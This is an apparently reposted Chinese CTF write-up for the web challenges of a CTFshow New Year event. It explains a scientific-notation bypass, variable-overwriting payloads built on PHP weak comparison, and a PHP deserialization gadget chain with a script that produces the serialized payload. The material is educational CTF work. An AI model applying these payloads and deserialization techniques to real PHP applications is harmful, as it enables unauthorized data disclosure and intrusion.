• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

CTFSHOW 年CTFweb部分

武飞扬头像
yu22x
帮助1

除夕

科学计数法绕过
payload
?year=202.2e1

初三

考的变量覆盖。
首先来看下这个函数

$_=function($__,$___){
    return $__==$___?$___:$__;
};

作用比较明显,接收两个参数,如果两个参数弱相等则返回第二个参数,否则返回第一个参数。
接着往下看

$$__($_($_GET{
    $___
}[$____]{
    $_____
}(),$flag));

先来看里面的这一部分

$_($_GET{
    $___
}[$____]{
    $_____
}(),$flag)

其实就是调用了刚才说的自定义函数,他的第一个参数是

$_GET{
    $___
}[$____]{
    $_____
}()

第二个参数是$flag
那么如果第一个参数整体可控的话让他弱等于$flag就可以了。
不过这只是返回值,没有回显的。
所以我们可以让最外层的$$__是个可打印的函数,比如var_dump
所以可以确定的是__=z&z=var_dump
再看里面的应该怎么传,$_GET{$___}[$____]{$_____}
中括号花括号一样的用法,简化下$_GET[$___][$____][$_____]
其实就是个三维数组嘛,可以直接传
x[b][c]=phpinfo&___=x&____=b&_____=c
这样最终$_GET[$___][$____][$_____]的值就是phpinfo。
为啥选phpinfo呢,以为phpinfo的返回值是true。
所以最终payload
?__=z&z=var_dump&x[b][c]=phpinfo&___=x&____=b&_____=c

初六

先来看最终利用点

    function __get($arg){
        global $flag;
        $arg="get".$arg;
        $this->$arg = $flag;
        return $this->secret;
    }

在这个地方
$flag给了$this->$arg,并且同时触发了__set魔术方法

    function __set($arg,$argv){
        $this->secret=base64_encode($arg.$argv);
        
    }

在__set魔术方法中 $arg就是get,$argv就是$flag
最终将secret的值和flag联系了起来。
所以现在的目的就是怎么进get。
我们知道要触发这个魔术方法,要么是调用不存在的属性,要么调用私有变量。
很明显需要进入invoke,而invoke需要把对象当作函数处理。
可以看到在__call魔术方法中的$this->key我们是可控的,只要赋值成当前对象就可以了。
然后想触发__call就得调用不存在的函数,就需要进__toString魔术方法,里面有个$this->secret()
想进__toString就得把对象当作字符串处理,在createSecret中存在变量的拼接。而createSecret又是在getSecret中调用的。
所以整条链就完整了。
payload

<?php 
class happy2year{

        private $secret;
        private $key;
        function __construct(){
                $this->key=$this;
        }
}

echo urlencode(serialize(new happy2year()));

实际上payload很简单,但是整个过程比较复杂,还是比较有意思的一道题。

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgfccai
系列文章
更多 icon
同类精品
更多 icon
继续加载